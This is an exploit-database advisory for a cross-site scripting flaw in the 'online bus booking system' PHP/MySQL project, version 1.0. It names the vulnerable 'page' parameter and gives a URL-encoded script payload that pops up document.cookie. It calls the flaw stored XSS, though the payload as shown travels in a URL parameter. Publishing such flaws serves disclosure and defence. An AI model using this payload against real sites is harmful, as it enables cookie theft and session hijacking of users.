Lucene search

K
packetstormKrishna YadavPACKETSTORM:160454
HistoryDec 11, 2020 - 12:00 a.m.

Onilne Bus Booking System Project 1.0 Cross Site Scripting

2020-12-1100:00:00
Krishna Yadav
packetstormsecurity.com
581
cross site scripting
stored xss
php mysql
`# Exploit Title: online bus booking system project using PHP MySQL - Stored cross-site scripting  
# Exploit Author: Krishna Yadav  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html  
# Version: 1.0  
# Tested on Windows 10/Kali Linux  
# Contact: https://www.linkedin.com/in/krishna-yadav-85aa34b2/  
  
Stored cross-site scripting:  
Stored attacks are those where the injected script is permanently stored on  
the target servers, such as in a database, in a message forum, visitor log,  
comment field, etc. The victim then retrieves the malicious script from the  
server when it requests the stored information. Stored XSS is also  
sometimes referred to as Persistent or Type-I XSS.  
  
Attack Vector:  
online bus booking system project using PHP MySQL version 1.0 is vulnerable  
to stored XSS. the home page is vulnerable to XSS.  
  
Vulnerable Parameter: http://localhost:85/bus_booking/index.php?page=  
<Payload>  
  
Payload:  
%22%3E%3C/\/\%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
`